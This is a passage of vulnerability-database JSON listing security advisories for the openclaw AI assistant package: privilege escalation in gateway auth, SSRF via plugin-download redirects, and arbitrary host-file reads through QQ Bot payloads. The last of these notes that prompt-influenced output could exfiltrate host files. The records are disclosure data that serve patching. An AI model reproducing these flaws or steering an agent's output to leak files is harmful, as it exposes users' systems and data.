1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-32920","GHSA-99qw-6mr3-36qr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nzu6-7a1g-4kf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89820?format=json","vulnerability_id":"VCID-p7gx-9usz-yyew","summary":"OpenClaw: Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`\n## Impact\n\nGateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`.\n\nPlugin HTTP routes using gateway auth could receive runtime write scopes even when the upstream trusted-proxy request only declared read.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.1.29`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42429","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20475","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20424","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20463","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42429"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4f8g-77mw-3rxc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42429","reference_id":"CVE-2026-42429","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42429"},{"reference_url":"https://github.com/advisories/GHSA-4f8g-77mw-3rxc","reference_id":"GHSA-4f8g-77mw-3rxc","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4f8g-77mw-3rxc"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication","reference_id":"openclaw-privilege-escalation-via-gateway-plugin-http-authentication","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:09:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42429","GHSA-4f8g-77mw-3rxc"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7gx-9usz-yyew"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89521?format=json","vulnerability_id":"VCID-p7me-4bzz-83cm","summary":"OpenClaw: Marketplace Plugin Download Follows Redirects Without SSRF Protection\n## Summary\nMarketplace Plugin Download Follows Redirects Without SSRF Protection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still uses bare redirect-following fetch in src/plugins/marketplace.ts for marketplace archives, and fixed-on-main only does not change that shipped SSRF exposure.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2ce44ca6a1302b166a128abbd78f72114f2f4f52` — 2026-03-31T12:59:42+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41297","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13336","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13378","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13373","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41297"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2ce44ca6a1302b166a128abbd78f72114f2f4f52"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vjx8-8p7h-82gr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41297","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41297"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect"},{"reference_url":"https://github.com/advisories/GHSA-vjx8-8p7h-82gr","reference_id":"GHSA-vjx8-8p7h-82gr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vjx8-8p7h-82gr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41297","GHSA-vjx8-8p7h-82gr"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7me-4bzz-83cm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89847?format=json","vulnerability_id":"VCID-p7v5-jqhq-nbhz","summary":"OpenClaw: QQ Bot structured payloads could read arbitrary local files\n## Summary\n\nBefore OpenClaw 2026.4.2, QQ Bot structured media payloads could read local files from attacker-chosen paths. A crafted structured payload could escape QQ Bot-owned media roots and cause arbitrary file reads on the host.\n\n## Impact\n\nPrompt-influenced structured payload output could exfiltrate any host file readable by the OpenClaw process through the QQ Bot media-send path. This was a real confidentiality bug on the host filesystem boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `2c45b06afdd6f7c621038b5419d8e661cff34a7f` — restrict QQ Bot structured payload local paths\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661